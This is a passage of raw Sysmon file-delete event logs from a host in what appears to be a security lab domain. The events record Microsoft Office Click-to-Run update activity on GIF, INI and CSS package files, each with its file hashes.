Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR36B.GIFMD5=B5DDA272E1D95DF874A07129584751A0,SHA256=EB2B429DEDCE423C7C39C9C502715D350BAB5F6FCEB8426077D800DE488F79D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR35F.GIFMD5=4DF989FFD4594D9854C6B5F21FBC24BA,SHA256=3E78ED526B58D6227A6EA6568DCAE3668E2F5B7ABCEA92BA678133054B7FA2A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR35B.GIFMD5=3187FB8467FDCDA9127668B5333F8F25,SHA256=4822AB091F4FCA0673450E3433716B89A08350BA63136B4D66BADB93BCD42E20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR34F.GIFMD5=0DA918F6C1D4AE83E6F2828B0E85BCEC,SHA256=48D7DCC85353294748EC7ACF2A0D66C12714B4AB1892B38BE6C0A75D1800A811,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR34B.GIFMD5=82E3CC56F6AA2270D45C933D6F54415F,SHA256=EC8C02338CD72C176E083E82A066FB044A9A2D109117495C1E9BC75D5250E293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR33F.GIFMD5=FDF349A95719A62731CC7D1C96CD4A7D,SHA256=8B88D43AADC8A92D46C5396809587EF1CA844D9926ED83E095F5431230D71BF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR33B.GIFMD5=9E4FE1879C6089A4B0B1B148119A03A3,SHA256=AF38FC7292581E2055E3CDF960D21FECC4C2905A2C2E75CB20749CE17BE322FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR32F.GIFMD5=ED88E6C883F9AFE74CFF31A5898E22EC,SHA256=B8C57637E0D316E75B00CBAF7D49D699A158FC6120756FF991BEEA1238977295,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR32B.GIFMD5=47AC7C1850943F88E706A0C9355B365D,SHA256=70AAA3DF4BAA282E3047EB8C9B506EB49203309D63E0639688F7B9C862C81A56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR31F.GIFMD5=83B2D3CE9F22038468D8404A27F93AC2,SHA256=AA78B1EAF31A25BDE17BC715451844C86F1716E80FD611668A55C40D24756146,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR31B.GIFMD5=77B151ACFB53FDD55986CB2A1B5D27A6,SHA256=C12A77E011CD554FFDFD03F0073C194552451E873CE13D63A1D7549204DAF2A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR30F.GIFMD5=2793CA91D8018DD9DF06CAB6C17FA8CC,SHA256=A69CC68E6F5A55F690B937FE9850CA05A9F8EA1033FDEBD00BBD223AD5A440A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR30B.GIFMD5=DECA3CA57A633F7A143BD18FB9D759EF,SHA256=55A4CF5D56EEAC19ECDE6E0FB17B2B6F997523406322BE548E858FC8FB7A05D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR2F.GIFMD5=5152383964D9D6D04BF6345141A287D4,SHA256=45976506AB75D457C6FB49D985682D9B3A1DC2942CA8F6251949550EB3347E0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR2B.GIFMD5=E33C6A779E5E74FA503A712B03B3C319,SHA256=741C64DB95E8A1154DAAB589DC5E60CC3FC34B7169CC2855ACA70647EF38AB8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR29F.GIFMD5=E4AEA994DC82E4C3BA1E84CFDE280FCE,SHA256=33B9BF35C10785D2D6A3FE0DF27900EF06F2E1F8BE0ACD1967D2C26F98C3A04D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR29B.GIFMD5=484B9D195F7BAFFD6C3D55F740E9A745,SHA256=44B71FAF49F0FEED4467B8FB7EF229C4389AECCD95C75136C7FA6A003191D8F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR28F.GIFMD5=C95ACE2B7A7EAA2C383FDE8E6997AE6A,SHA256=C6FCD0E53EB210C65BA1849EDC03152E4BDC1B6576A5ED86CEB3EB5487B7B737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR28B.GIFMD5=F5BB9B4DE72EEFE5D61E97F249CB2C29,SHA256=86132DBFC3CB7C8CE0449F7489B93BAEBD39BAF2C308A7AFA9F54E9FEFDEA4A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR27F.GIFMD5=EC8B343F01C949C4FA951CDA888E1898,SHA256=33EB6F289BCD0E539C984BA88EF41EC9AA24F50CAFEB297A48D95A6C45ED30E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR26F.GIFMD5=AFC698A92CE7207D29DCD1E5500CAA64,SHA256=3B937EF2BF4E14207D5446255A72AC7145EA51F80FEDC593EA7C05A2274B87A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR25F.GIFMD5=BD0C382C09CE2545E403E2814D13CCBF,SHA256=823665B05B105E45D9DF005F6B6853F0D0EDB12987C6BFFA71DD1CCB451A0F06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR24F.GIFMD5=BDF4F4F6F143215D5D95EC8B23EF18A2,SHA256=8969A46C1FB1727118C337C52A7BBACC4873F65343A4181717E1B6C17180C57A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR23F.GIFMD5=8F752E6DEC4BF3A26754D25CAA50B7C3,SHA256=48D08765B22056A23C0E2E715A4E1CED492E6FA4CA8D00F5C6823306E19E9036,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR22F.GIFMD5=FDB2A6B478F05480DB620C89B36E44FE,SHA256=743095CD3D8CBC11B8B3047C226352EC8D8EB3B9E9CE34A3A31040136D3CACC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR21F.GIFMD5=8AB9FFD1761569B415236DE2C5AC94A5,SHA256=4CDE918C7F01F53BE4A421579614A9AB4A3BC4D9FA63182EB91764F31074543D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR20F.GIFMD5=7054771093869151DFE4C878403A3603,SHA256=D4527E6C8FAE866E4C5FF406E76AD130570DAB79F1BE201FB25FCF0EF4D8CD51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR1F.GIFMD5=EEC45566CCC469EBC5631FAD063548C6,SHA256=109E26EFC6BF45CBBFD2E855E88A2CD371824D664CD0B04542FD0EB301D54318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR1B.GIFMD5=754A0E1E2AEBC1EE85E6802C2C260E65,SHA256=1B078666B9BE6703D1966474EAFDA7A1541F4ED86BDB974FDBD20E4CCD675975,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR19F.GIFMD5=C7CA47018E0F38344A57A6B2EFE1B6D8,SHA256=65D2F30659A422EFCD89E53F09AFF7B0B9A3A6E8F4DA2EAC95AE1D8C3FDC9F88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR18F.GIFMD5=7FF0BF5F12946C0E5F4EC8660311F9F7,SHA256=A929D685D51ADFDA6AE98F2A33AC4FE4F2D9D510DEC91D247EAD8360A52800DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR17F.GIFMD5=2795A20A1E48EE3B3FBC611CFFE36D6F,SHA256=C6B22C76843C0DB23824560F846ABE46FCE48973F199FC2DB7CC56E1FBC5B9D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR16F.GIFMD5=5EE8D613355AD3439BBB7D305B601350,SHA256=BA873140EF958A1821F36EB12D27E635E5AC6D86CD2F3F6434AAB49A0CEE563D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR15F.GIFMD5=C9F3DEB9EFB7C940EC206327DE5E0BD6,SHA256=116C4F398C574C7C72322CB80EB766FDFE64F73AAE3578B47BDD95EEF04060AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR14F.GIFMD5=DF03692045292C2221015F8CB2EE26C3,SHA256=0021718E633BB4F17581B0898B137EAA628A56E566836C774FD0933B2037360F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR13F.GIFMD5=D362B2D6C8D3229AF0BD777389E3F2B2,SHA256=65B4B97DBE1897FE7E4B4A5DF311438563C124F9008BDC7936E4A5CC51A1F4B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR12F.GIFMD5=BC267F63F56638EB254213C7802BE13D,SHA256=541A8209BBE6F13F47A3C9DAB21EE84148191F23E485E40AA7CAA8AEC80261EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR11F.GIFMD5=51F56C2757E8234474CA76040104E77B,SHA256=51CF49C7C853B34A19DAE168C0C1950387DD61C3B3D13847D20FCAB1AFD363BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR10F.GIFMD5=E6995B2CAC8EA3D2B91CF312A839A90F,SHA256=519E8308833AA911C1AEFA6CFC59E7FC94E81F1FAE47BBA229136B415799E03F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PAPERS.INIMD5=4DCFCE92047B3916F360928A52F03E75,SHA256=49C0011CF4F97ED84564FD81A9473702344713EE3EFA6EA8FA1A8480B953B448,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME55.CSSMD5=0D452D09E337DC95EB045A546A109B20,SHA256=7F26A65B53031FB7E1BB5A58CCE533445E20E536BFA88F29554246AF7ECBCF67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME54.CSSMD5=A03CD38596C14453D632E220D99268BA,SHA256=11A7753F1A83A2113C3C85736EBF83E2A06117925DA8A468D481D1CE51A03A8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME53.CSSMD5=927D6D8FF5B570049E6F9525A6CA7093,SHA256=F72AC6AE0A6D10F99315B039E877956CB1270A301E4514AE1205176D36D4198A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME52.CSSMD5=001D2870959C5E9F6E6E4B02C376D9AD,SHA256=C95E55529AE8FE7E4EBFBFD0137D678A29A7B75BA60C82681A3DBA50A2FD50D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 